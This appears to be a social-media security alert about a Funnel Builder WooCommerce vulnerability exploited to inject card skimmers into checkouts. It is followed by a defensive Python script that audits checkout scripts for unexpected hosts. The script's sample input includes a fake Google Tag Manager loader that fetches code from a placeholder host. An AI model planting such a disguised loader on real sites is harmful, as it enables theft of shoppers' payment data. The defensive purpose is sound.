Funnel Builder Vulnerability Enables Skimmer Injection on WooCommerce Checkouts

Colleagues, please note: active exploitation of a vulnerability in the Funnel Builder plugin for WooCommerce has been observed.
- Sansec reports: versions before 3.15.0.3 allow unauthenticated attackers to write arbitrary JavaScript to the "External Scripts" checkout setting.
- Attackers disguise scripts as Google Tag Manager and load skimmers via remote C2 to steal card numbers, CVV and addresses.
- Over 40,000 stores affected; FunnelKit released a patch in v3.15.0.3. Check Settings > Checkout > External Scripts.
Why it matters: checkout compromise causes payment data leakage and reputational damage.
Have you checked your stores for unexpected checkout scripts?
#cybersecurity #WooCommerce #WordPress #Magecart
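A defender-side check for the External Scripts review described above, as an added example that is not part of the original post or FunnelKit's code: paste the field's contents into `audit_external_scripts` and it lists script hosts outside an allowlist, marking those that present themselves as Google Tag Manager. The allowlist, the function and class names, and the sample snippet with its placeholder `.example.test` host are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the hosts this store expects in checkout scripts; adjust per store.
ALLOWED_HOSTS = {"www.googletagmanager.com", "www.google-analytics.com"}
GTM_MARKERS = re.compile(r"gtm|gtag|dataLayer|google tag manager", re.I)
URL_RE = re.compile(r"(?:[a-z]+:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)
# Constructed sample: a genuine GTM tag plus a look-alike on a placeholder host.
SAMPLE = """
<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>
<script>
  // Google Tag Manager
  (function(d,s){var j=d.createElement(s);j.async=true;
  j.src='//gtm-loader.example.test/gtm.js';d.head.appendChild(j);})(document,'script');
</script>
"""

class ScriptAudit(HTMLParser):
    """Collect (host, context) for every URL referenced by <script> tags."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.refs = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            src = dict(attrs).get("src")
            if src:
                self.refs.append((urlparse(src, scheme="https").hostname, src))
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
    def handle_data(self, data):
        if self.in_script:  # inline code: pull out the hosts it loads from
            self.refs += [(m.group(1), data) for m in URL_RE.finditer(data)]

def audit_external_scripts(value):
    """Return (kind, host) for each script host outside ALLOWED_HOSTS."""
    parser = ScriptAudit()
    parser.feed(value)
    parser.close()
    findings = []
    for host, context in parser.refs:
        host = (host or "").lower()
        if host and host not in ALLOWED_HOSTS:  # relative src = same origin, skipped
            kind = "gtm-lookalike" if GTM_MARKERS.search(context) else "unknown-host"
            findings.append((kind, host))
    return findings
```

An empty result only means every referenced host is on the allowlist; it does not replace updating to v3.15.0.3.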

